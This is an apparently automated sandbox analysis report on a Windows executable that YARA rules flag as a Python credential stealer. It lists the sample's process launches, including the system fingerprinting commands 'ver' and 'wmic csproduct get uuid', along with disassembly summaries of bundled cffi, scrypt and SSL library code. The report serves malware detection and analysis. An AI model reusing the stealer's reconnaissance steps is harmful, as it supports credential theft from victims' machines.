                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000002.1621186652.0000010BE9018000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000002.1621510779.0000010BE90D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:04:46:38
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:04:46:39
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                                        Start time:04:46:39
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Reset < >
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3774217044.00007FF677EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF677EB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.3774169948.00007FF677EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.3774269997.00007FF677ED1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.3774320148.00007FF677EDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.3774320148.00007FF677EE4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.3774320148.00007FF677EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff677eb0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: e5671e1bf894bb2d0dbdd680844875ac9324173a934ce403ed33779714afc281
                                                                                                                                                                                                                                          • Instruction ID: 8b2dbd03314e3d79332eea3ec71cd67c60b417408616f98d672b1521502f3448
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5671e1bf894bb2d0dbdd680844875ac9324173a934ce403ed33779714afc281
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94112A22B24F068AEB00DF70E8592B833A4FB59758F540E31EE6D867A4DF7CE1948340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000025.00000002.1605922472.00007FF652C91000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF652C90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1605849339.00007FF652C90000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1606295476.00007FF652CB1000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1606429913.00007FF652CBE000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1606429913.00007FF652CC4000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1606429913.00007FF652CC8000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1607256267.00007FF652CD1000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000025.00000002.1607256267.00007FF6536D1000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_7ff652c90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: e5671e1bf894bb2d0dbdd680844875ac9324173a934ce403ed33779714afc281
                                                                                                                                                                                                                                          • Instruction ID: 407ff4c8ce3cebaffaa8efe644fd35cda518db4a61dd999c2c2d34c5654eca85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5671e1bf894bb2d0dbdd680844875ac9324173a934ce403ed33779714afc281
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD112E62B14F058AEB40CF60EC552B833B4FB19B58F880E31DE6D967A5DFB8D1548380

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:45
                                                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                                                          execution_graph 18949 7ff81e51a280 PyLong_AsVoidPtr 18950 7ff81e51a2bf 18949->18950 18957 7ff81e51a544 18949->18957 18951 7ff81e51a55a PyErr_Occurred 18950->18951 18952 7ff81e51a2e1 memcpy PyMem_Malloc 18950->18952 18953 7ff81e51a565 PyErr_Format 18951->18953 18951->18957 18954 7ff81e51a329 PyErr_NoMemory 18952->18954 18955 7ff81e51a331 PyModule_Create2 18952->18955 18953->18957 18956 7ff81e51a376 18954->18956 18955->18956 18956->18957 18958 7ff81e51a382 _PyObject_GC_New 18956->18958 18958->18957 18959 7ff81e51a39b PyDict_New 18958->18959 18960 7ff81e51a549 18959->18960 18961 7ff81e51a3ae PyModule_AddObject 18959->18961 18960->18957 18962 7ff81e51a54f _Py_Dealloc 18960->18962 18961->18957 18963 7ff81e51a439 18961->18963 18962->18957 18974 7ff81e518b50 PyUnicode_FromString 18963->18974 18966 7ff81e51a456 PyModule_AddObject 18966->18957 18967 7ff81e51a471 18966->18967 18984 7ff81e51a0c0 18967->18984 18970 7ff81e51a494 PySys_GetObject 18970->18957 18971 7ff81e51a4ad 18970->18971 18971->18971 18972 7ff81e51a50c PyDict_SetItemString 18971->18972 18972->18957 18973 7ff81e51a531 PyDict_SetItemString 18972->18973 18973->18957 18975 7ff81e518b84 PyDict_New 18974->18975 18976 7ff81e518bc7 18974->18976 18977 7ff81e518bb8 18975->18977 18978 7ff81e518b92 PyType_GenericAlloc 18975->18978 18979 7ff81e518bd1 FreeLibrary 18976->18979 18980 7ff81e518bda 18976->18980 18977->18976 18982 7ff81e518bbe _Py_Dealloc 18977->18982 18978->18980 18981 7ff81e518ba9 18978->18981 18979->18980 18980->18957 18980->18966 18981->18977 18983 7ff81e518baf _Py_Dealloc 18981->18983 18982->18976 18983->18977 18985 7ff81e51a0f3 PyTuple_New PyTuple_New 18984->18985 18986 7ff81e51a1f6 18984->18986 18988 7ff81e51a133 18985->18988 18989 7ff81e51a247 18985->18989 18986->18957 18986->18970 18988->18986 18990 7ff81e51a23b 18988->18990 18993 7ff81e51a150 PyImport_ImportModule 18988->18993 18994 7ff81e51a215 PyErr_Format 18988->18994 18997 7ff81e51a1a9 _Py_Dealloc 18988->18997 18998 7ff81e51a1c7 PyType_IsSubtype 18988->18998 18989->18986 18992 7ff81e51a25d _Py_Dealloc 18989->18992 18990->18989 18991 7ff81e51a241 _Py_Dealloc 18990->18991 18991->18989 18992->18986 18993->18994 18995 7ff81e51a165 PyObject_GetAttrString 18993->18995 18994->18989 18994->18990 18995->18988 18996 7ff81e51a189 PyObject_GetAttrString 18995->18996 18996->18988 18997->18988 18998->18988 18998->18994

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Err_Module_Object$ItemString$Create2DeallocFormatLong_MallocMem_MemoryObject_OccurredSys_Voidmemcpy
                                                                                                                                                                                                                                          • String ID: .lib$1.15.1$cffi extension module '%s' uses an unknown version tag %p. This module might need a more recent version of cffi than the one currently installed, which is %s$ffi$lib$modules
                                                                                                                                                                                                                                          • API String ID: 3634443470-3901617851
                                                                                                                                                                                                                                          • Opcode ID: f2b7d8321586873191595bc9c6fad00b50692cf81915cce527f4b76d37408325
                                                                                                                                                                                                                                          • Instruction ID: 91914de786c679e4d6d50df2f806591469213c0f3aecb42d89137234f4149e02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2b7d8321586873191595bc9c6fad00b50692cf81915cce527f4b76d37408325
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E916962A09F8282EB158F26ED64AE837A8FB48BE4F464235CE5D47751EF39F155C300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 117 7ff81e4e18a0-7ff81e4e18db 118 7ff81e4e1c95 117->118 119 7ff81e4e18e1-7ff81e4e1933 117->119 120 7ff81e4e1c9d-7ff81e4e1ca4 118->120 119->120 121 7ff81e4e1939-7ff81e4e1978 _PyArg_UnpackKeywords 119->121 120->121 124 7ff81e4e1caa-7ff81e4e1cad 120->124 122 7ff81e4e1c02-7ff81e4e1c27 121->122 123 7ff81e4e197e-7ff81e4e1990 PyObject_GetBuffer 121->123 126 7ff81e4e1c33-7ff81e4e1c39 122->126 127 7ff81e4e1c29-7ff81e4e1c2d PyBuffer_Release 122->127 123->122 128 7ff81e4e1996-7ff81e4e19a4 PyBuffer_IsContiguous 123->128 124->123 125 7ff81e4e1cb3 124->125 125->121 131 7ff81e4e1c46-7ff81e4e1c5f call 7ff81e4e3c20 126->131 132 7ff81e4e1c3b-7ff81e4e1c40 PyBuffer_Release 126->132 127->126 129 7ff81e4e4cda-7ff81e4e4cf9 _PyArg_BadArgument 128->129 130 7ff81e4e19aa-7ff81e4e19c3 128->130 129->122 133 7ff81e4e1a97 130->133 134 7ff81e4e19c9-7ff81e4e19d0 130->134 132->131 139 7ff81e4e1a9a-7ff81e4e1aa2 133->139 136 7ff81e4e1a07-7ff81e4e1a0e 134->136 137 7ff81e4e19d2-7ff81e4e19e2 PyObject_GetBuffer 134->137 144 7ff81e4e1a14-7ff81e4e1a22 136->144 145 7ff81e4e4d23 136->145 142 7ff81e4e1bf2-7ff81e4e1bfa 137->142 143 7ff81e4e19e8-7ff81e4e19f7 PyBuffer_IsContiguous 137->143 140 7ff81e4e1aa8-7ff81e4e1aad 139->140 141 7ff81e4e4d2b-7ff81e4e4d32 139->141 146 7ff81e4e1ab3-7ff81e4e1abc 140->146 147 7ff81e4e1d8c-7ff81e4e1d93 140->147 153 7ff81e4e4d3e-7ff81e4e4d45 141->153 142->122 148 7ff81e4e19fd-7ff81e4e1a01 143->148 149 7ff81e4e4cfe-7ff81e4e4d1e _PyArg_BadArgument 143->149 150 7ff81e4e1d23-7ff81e4e1d41 _PyArg_BadArgument 144->150 151 7ff81e4e1a28-7ff81e4e1a38 144->151 145->141 152 7ff81e4e1ac2-7ff81e4e1ad0 PyLong_AsUnsignedLong 146->152 146->153 156 7ff81e4e1d9f-7ff81e4e1da8 PyErr_Occurred 147->156 148->133 148->136 149->142 150->142 151->133 154 7ff81e4e1a3a-7ff81e4e1a44 151->154 155 7ff81e4e1ad6-7ff81e4e1ad9 152->155 152->156 165 7ff81e4e4d51-7ff81e4e4d56 153->165 157 7ff81e4e1a66-7ff81e4e1a70 154->157 158 7ff81e4e1a46-7ff81e4e1a54 154->158 159 7ff81e4e1adf-7ff81e4e1ae4 155->159 160 7ff81e4e1bdb-7ff81e4e1be2 155->160 156->160 166 7ff81e4e1dae-7ff81e4e1dbc 156->166 163 7ff81e4e1a76-7ff81e4e1a84 157->163 164 7ff81e4e1c60-7ff81e4e1c67 157->164 161 7ff81e4e1d46-7ff81e4e1d64 _PyArg_BadArgument 158->161 162 7ff81e4e1a5a-7ff81e4e1a64 158->162 159->160 168 7ff81e4e1aea-7ff81e4e1af8 PyLong_AsUnsignedLong 159->168 167 7ff81e4e1be9-7ff81e4e1bec PyErr_SetString 160->167 161->142 162->133 162->157 171 7ff81e4e1d69-7ff81e4e1d87 _PyArg_BadArgument 163->171 172 7ff81e4e1a8a-7ff81e4e1a91 163->172 169 7ff81e4e1c69-7ff81e4e1c75 PyLong_AsLong 164->169 170 7ff81e4e1cb8 164->170 173 7ff81e4e4d61-7ff81e4e4d73 call 7ff81e4e2300 165->173 174 7ff81e4e4d58-7ff81e4e4d5b _Py_Dealloc 165->174 166->167 167->142 177 7ff81e4e1dc1-7ff81e4e1dca PyErr_Occurred 168->177 178 7ff81e4e1afe-7ff81e4e1b0c PyLong_AsUnsignedLong 168->178 179 7ff81e4e1c77-7ff81e4e1c80 PyErr_Occurred 169->179 180 7ff81e4e1c86-7ff81e4e1c8d 169->180 176 7ff81e4e1cbb-7ff81e4e1ccc PyLong_AsLong 170->176 171->142 172->133 172->164 173->142 174->173 176->139 183 7ff81e4e1cd2-7ff81e4e1cdb PyErr_Occurred 176->183 177->178 181 7ff81e4e1dd0-7ff81e4e1dde 177->181 184 7ff81e4e1de3-7ff81e4e1dec PyErr_Occurred 178->184 185 7ff81e4e1b12-7ff81e4e1b19 178->185 179->142 179->180 180->139 186 7ff81e4e1c93 180->186 181->167 183->142 188 7ff81e4e1ce1 183->188 184->185 187 7ff81e4e1df2-7ff81e4e1e00 184->187 189 7ff81e4e1e05 185->189 190 7ff81e4e1b1f-7ff81e4e1b24 185->190 186->176 187->167 188->139 189->129 191 7ff81e4e1d01-7ff81e4e1d1e PyErr_Format 190->191 192 7ff81e4e1b2a-7ff81e4e1b60 EVP_PBE_scrypt 190->192 191->142 193 7ff81e4e1ce6-7ff81e4e1cfc call 7ff81e4e2300 192->193 194 7ff81e4e1b66-7ff81e4e1b79 PyBytes_FromStringAndSize 192->194 193->142 194->142 196 7ff81e4e1b7b-7ff81e4e1bd0 PyEval_SaveThread EVP_PBE_scrypt PyEval_RestoreThread 194->196 196->165 198 7ff81e4e1bd6-7ff81e4e1bd9 196->198 198->142
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_LongLong_$Arg_Buffer_$ArgumentOccurredUnsigned$BufferContiguousE_scryptEval_Object_ReleaseStringThread$Bytes_FormatFromKeywordsRestoreSaveSizeUnpack
                                                                                                                                                                                                                                          • String ID: @$Invalid parameter combination for n, r, p, maxmem.$argument 'n'$argument 'p'$argument 'password'$argument 'r'$argument 'salt'$contiguous buffer$dklen must be greater than 0 and smaller than %d$int$maxmem must be positive and smaller than %d$n is required and must be an unsigned int$n must be a power of 2.$p is required and must be an unsigned int$password is too long.$r is required and must be an unsigned int$salt is required$salt is too long.$scrypt
                                                                                                                                                                                                                                          • API String ID: 756542180-2474027488
                                                                                                                                                                                                                                          • Opcode ID: 0a29c0e4a71e7db7626906dc46989aee6fef12d61af907a38f90fd19bd110d46
                                                                                                                                                                                                                                          • Instruction ID: 0e6126fe21a46b756cba173fe7c6a890e4ed37086b1c39d37003195a2b84250a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a29c0e4a71e7db7626906dc46989aee6fef12d61af907a38f90fd19bd110d46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F1F721A08E5385EA64CB65E848AB923A4FF44BF8F545335D95E47BA4DF3CF4A9C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_sizeO_memcmpR_flagsX_cipherX_md
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                                          • API String ID: 2456506815-352295518
                                                                                                                                                                                                                                          • Opcode ID: 7f6bb4ce5a13ded5a01e8469c0da858d7f5bf9fd04abf033b3754e5042150ff7
                                                                                                                                                                                                                                          • Instruction ID: 76ab9215c3204e3f369e40d37f5eebef2d0e3320052e685f8bc22a85b87f5af8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f6bb4ce5a13ded5a01e8469c0da858d7f5bf9fd04abf033b3754e5042150ff7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4725BB2A08A4286FF60CE25E4447BA76A0FB44BE8F544235DA4D4B7D9DF7DE981C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Deadline_DeallocErr_Eval_O_ctrlThread$CheckInitL_do_handshakeL_get_rbioL_get_wbioObjectR_clear_errorR_peek_last_errorRestoreSaveSignalsStringWeakref_
                                                                                                                                                                                                                                          • String ID: Underlying socket connection gone$_ssl.c:985: The handshake operation timed out$_ssl.c:989: Underlying socket has been closed.$_ssl.c:993: Underlying socket too large for select().
                                                                                                                                                                                                                                          • API String ID: 3614085790-1555035615
                                                                                                                                                                                                                                          • Opcode ID: 440c928ef620d8fd86e5c477a8ddb0704695192f1bc096a942d5c86487951439
                                                                                                                                                                                                                                          • Instruction ID: 837732a44688132870c363439c146acbdf6dbc2954519feee6c195c6fe3cd736
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 440c928ef620d8fd86e5c477a8ddb0704695192f1bc096a942d5c86487951439
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4612A65A08E4686FB619F229894179A760FF89BF6F544631DD0E47B98DF3CF486C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Cannot allocate write+execute memory for ffi.callback(). You might be running on a system that prevents this. For more information, see https://cffi.readthedocs.io/en/latest/using.html#callbacks, xrefs: 00007FF81E50BAFA
                                                                                                                                                                                                                                          • FFI_TRAMPOLINE_SIZE too small in c/libffi_x86_x64\ffi.c, xrefs: 00007FF81E50BC83
                                                                                                                                                                                                                                          • O!O|OO:callback, xrefs: 00007FF81E50B9A2
                                                                                                                                                                                                                                          • libffi failed to build this callback, xrefs: 00007FF81E50BCE1
                                                                                                                                                                                                                                          • %s: callback with unsupported argument or return type or with '...', xrefs: 00007FF81E50BB85
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Dealloc$FormatObject_String$AllocArg_ErrorFatalInfoParseSizeSystemTrackTuple_Virtual
                                                                                                                                                                                                                                          • String ID: %s: callback with unsupported argument or return type or with '...'$Cannot allocate write+execute memory for ffi.callback(). You might be running on a system that prevents this. For more information, see https://cffi.readthedocs.io/en/latest/using.html#callbacks$FFI_TRAMPOLINE_SIZE too small in c/libffi_x86_x64\ffi.c$O!O|OO:callback$libffi failed to build this callback
                                                                                                                                                                                                                                          • API String ID: 1427098410-3074636352
                                                                                                                                                                                                                                          • Opcode ID: 31b87f6d0031714a8472b6f2eb667830e2830e2a7222502f323c82f83a283451
                                                                                                                                                                                                                                          • Instruction ID: 8c07947953d3ae59b73a4f5ff1955cfade538002d97d8815d6edb2067ca5d706
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31b87f6d0031714a8472b6f2eb667830e2830e2a7222502f323c82f83a283451
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4B12836A09F82C5EA548F25ECA42B873A4FB88BE4F554632DA4E47764DF3DE445C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
